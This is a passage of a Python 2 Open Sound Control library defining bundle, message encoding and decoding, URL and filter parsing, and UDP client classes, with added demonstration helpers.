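# 'b' (blob) typehint described above fit together. The helper name '_example_message_usage'
# is an addition for demonstration purposes only.
def _example_message_usage():
	msg = OSCMessage("/filter/cutoff")
	msg.append(440)                       # appended as a 32-bit int, typetag 'i'
	msg.append(0.5)                       # appended as a 32-bit float, typetag 'f'
	msg.append("\x00\x01\x02\x03", 'b')   # force a blob with the 'b' typehint
	assert msg.tags() == ['i', 'f', 'b']
	return msg.items()                    # list of (typetag, value) tuples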
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
	  OSCMessage objects are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in self.values():
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
		If 'argument' is an iterable, its elements will be encapsulated in a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if type(argument) == types.DictType:
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
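# Illustrative sketch, not part of the original module: building an OSCBundle as described
# in the class docstring above. Plain values are wrapped in OSCMessages addressed to the
# bundle's default address; a dict can override address and arguments. The helper name
# '_example_bundle_usage' is an addition for demonstration purposes only.
def _example_bundle_usage():
	bundle = OSCBundle("/synth", time=time.time() + 0.5)   # ask the receiver to process this in half a second
	bundle.append(440.0)                                   # becomes OSCMessage('/synth') with one float argument
	bundle.append({'addr': "/synth/amp", 'args': [0.5]})   # dict form: override the address per message
	return bundle.getBinary()                              # '#bundle'-framed packet, ready to send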
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
	An OSC-Blob is a binary encoded block of data, preceded by a 'size' (int32).
	The size is always a multiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if type(next) in types.StringTypes:
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = ""
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', long(secs), long(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0L, 1L)
return binary
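# Illustrative sketch, not part of the original module: an OSC timetag counts seconds since
# 1 Jan 1900 (the NTP epoch) as a 32.32 fixed-point value; the special encoding (0, 1) means
# 'process immediately'. The helper name '_example_timetags' is an addition for demonstration.
def _example_timetags():
	immediately = OSCTimeTag(0)                    # packs the special 'immediate' tag (0, 1)
	in_one_second = OSCTimeTag(time.time() + 1.0)  # absolute time, one second from now
	return (immediately, in_one_second)            # both are 8-byte big-endian strings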
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = string.find(data,"\0")
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length], data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print "Error: too few bytes for int", data, len(data)
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (long(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
		time = int(NTP_epoch + high) + float(low) / NTP_units_per_second
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print "Error: too few bytes for float", data, len(data)
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print "Error: too few bytes for double", data, len(data)
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
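# Illustrative sketch, not part of the original module: decodeOSC() is the inverse of
# OSCMessage.getBinary(). A decoded message is a flat list [address, typetags, arg, ...];
# a decoded bundle is ["#bundle", timetag, [submessage], ...]. The helper name
# '_example_roundtrip' is an addition for demonstration purposes only.
def _example_roundtrip():
	msg = OSCMessage("/test")
	msg.append([1, 2.0, "three"])          # int, float and string arguments
	decoded = decodeOSC(msg.getBinary())
	assert decoded == ["/test", ",ifs", 1, 2.0, "three"]
	return decoded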
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print "byte 0 1 2 3 4 5 6 7 8 9 A B C D E F"
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % ord(bytes[i])
if (i+1) % 16 == 0:
print "%s: %s" % (line, repr(bytes[i-15:i+1]))
line = ""
bytes_left = num % 16
if bytes_left:
print "%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:]))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == types.TupleType:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if type(port) == types.IntType:
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
	"""Convert provided string in 'host:port/prefix' format to its components
Returns ((host, port), prefix)
"""
if not (type(url) in types.StringTypes and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
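# Illustrative sketch, not part of the original module: getUrlStr() and parseUrlStr() map
# between (host, port)/prefix tuples and the 'host:port/prefix' notation used throughout
# this module. The helper name '_example_url_strings' is an addition for demonstration.
def _example_url_strings():
	url = getUrlStr(('127.0.0.1', 9000), '/synth')       # e.g. 'localhost:9000/synth', if reverse-lookup resolves
	((host, port), prefix) = parseUrlStr("osc://192.168.1.10:9001/mixer")
	return (url, host, port, prefix)                     # (..., '192.168.1.10', 9001, '/mixer')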
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
		- server: Local OSCServer-instance whose socket this client will use for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
self.setServer(server)
self.client_address = None
def _setSocket(self, skt):
"""Set and configure client socket"""
if self.socket != None:
self.close()
self.socket = skt
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
def _ensureConnected(self, address):
"""Make sure client has a socket connected to address"""
if not self.socket:
if len(address) == 4:
address_family = socket.AF_INET6
else:
address_family = socket.AF_INET
self._setSocket(socket.socket(address_family, socket.SOCK_DGRAM))
self.socket.connect(address)
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if server == None:
if hasattr(self,'server') and self.server:
if self.server.client != self:
raise OSCClientError("Internal inconsistency")
self.server.client.close()
self.server.client = None
self.server = None
return
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
self._setSocket(server.socket.dup())
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket and other.socket:
			sockEqual = (self.socket._sock == other.socket._sock)
else:
sockEqual = (self.socket == None and other.socket == None)
if not sockEqual:
return False
if self.server and other.server:
			return (self.server == other.server)
else:
return self.server == None and other.server == None
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
if self.socket:
return self.socket.getpeername()
else:
return None
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self._ensureConnected(address)
self.client_address = address
except socket.error, e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
		- address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self._ensureConnected(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
if not self.socket:
raise OSCClientError("Called send() on non-connected client")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
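# Illustrative sketch, not part of the original module: typical one-shot use of OSCClient.
# The host/port values are placeholders for a listening OSCServer, and the helper name
# '_example_client_usage' is an addition for demonstration purposes only.
def _example_client_usage():
	client = OSCClient()
	client.connect(('127.0.0.1', 9000))    # placeholder address of a remote OSCServer
	msg = OSCMessage("/print")
	msg.append("hello from OSCClient")
	client.send(msg, timeout=1.0)          # raises OSCClientError if the socket isn't writable in time
	client.close()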
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if type(args) in types.StringTypes:
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in filters.keys():
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in filters.values():
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in filters.items():
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
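# Illustrative sketch, not part of the original module: parseFilterStr() and getFilterStr()
# convert between the '+<addr> -<addr>' notation and the {addr: bool} dicts used by
# OSCMultiClient below. The helper name '_example_filter_strings' is an addition.
def _example_filter_strings():
	(prefix, filters) = parseFilterStr("/synth +/synth/freq -/synth/amp")
	# prefix == '/synth', filters == {'/synth/freq': True, '/synth/amp': False}
	return getFilterStr(filters)   # e.g. ['+/*', '+/synth/freq', '-/synth/amp'] (dict order may vary)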
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = string.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
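# Illustrative sketch, not part of the original module: OSC address-pattern matching as used
# by dispatchMessage() further down; a match only counts when it covers the whole registered
# address. The helper name '_example_pattern_match' is an addition for demonstration.
def _example_pattern_match():
	expr = getRegEx("/synth/*/freq")            # '*' -> '.*', '?' -> '.', '{a,b}' -> '(a|b)'
	match = expr.match("/synth/osc1/freq")
	return (match is not None) and (match.end() == len("/synth/osc1/freq"))   # True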
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
	This client keeps a dict of 'OSCTargets', and sends each OSCMessage to each OSCTarget.
	The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
	The OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
		- server: Local OSCServer-instance whose socket this client will use for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
	def _searchHostAddr(self, host):
		"""Search the subscribed OSCTargets for (the first occurrence of) the given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in self.targets.keys():
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
	def _updateFilters(self, dst, src):
		"""Update a 'filters' dict with values from another 'filters' dict:
		- src[a] == True and dst[a] == False: del dst[a]
		- src[a] == False and dst[a] == True: del dst[a]
		- a not in dst: dst[a] = src[a]
"""
if '/*' in src.keys(): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in src.items():
if (addr in dst.keys()) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in self.targets.keys():
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if type(filters) in types.StringTypes:
(_, filters) = parseFilterStr(filters)
elif type(filters) != types.DictType:
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
elif (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if type(address) == types.TupleType:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in self.targets.keys():
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in self.targets.items():
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if type(address) in types.StringTypes:
address = self._searchHostAddr(address)
if (type(address) == types.TupleType):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in self.targets.keys()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in dict.items():
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in self.targets.items():
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
		- address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
	def _filterMessage(self, filters, msg):
		"""Checks the given OSCMessage against the given filters.
		'filters' is a dict containing OSC-address:bool pairs.
		If 'msg' is an OSCBundle, recursively filters its constituents.
		Returns None if the message is to be filtered, else returns the message;
		for an OSCBundle, returns a copy of the bundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = out.values()
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in filters.keys():
if filters['/*']:
out = msg
else:
out = None
elif False in filters.values():
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in filters.keys():
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
	def _prefixAddress(self, prefix, msg):
		"""Makes a copy of the given OSCMessage, then prepends the given prefix to
		the message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = out.values()
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in self.targets.items():
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
				out = self._prefixAddress(prefix, out)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
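# Illustrative sketch, not part of the original module: fan-out with OSCMultiClient. Each
# subscribed target may get a per-target address-prefix and message-filters, as implemented
# by _prefixAddress() and _filterMessage() above. The host/port values are placeholders and
# the helper name '_example_multiclient_usage' is an addition. Note that OSCMultiClient needs
# a socket to send from, so it is attached to an OSCServer (defined further down).
def _example_multiclient_usage():
	server = OSCServer(('127.0.0.1', 0))       # port 0 picks a free UDP port
	client = OSCMultiClient(server=server)     # the client sends from the server's socket
	client.setOSCTarget(('127.0.0.1', 9000), prefix='/deskA')
	client.setOSCTargetFromStr("127.0.0.1:9001/deskB +/fader -/meter")
	msg = OSCMessage("/fader/1")
	msg.append(0.75)
	client.send(msg)       # delivered as '/deskA/fader/1' and '/deskB/fader/1', filters permitting
	server.close()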
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
	def getOSCAddressSpace(self):
		"""Returns a list containing all OSC-addresses registered with this Server.
"""
return self.callbacks.keys()
	def dispatchMessage(self, pattern, tags, data, client_address):
		"""Attempt to match the given OSC-address pattern, which may contain '*',
		against all callbacks registered with the OSCServer.
		Calls the matching callback and returns whatever it returns.
		If no match is found, and a 'default' callback is registered, it calls that one,
		or raises NoCallbackError if a 'default' callback is not registered.
		- pattern (string): The OSC-address of the received message
		- tags (string): The OSC-typetags of the received message's arguments, without ','
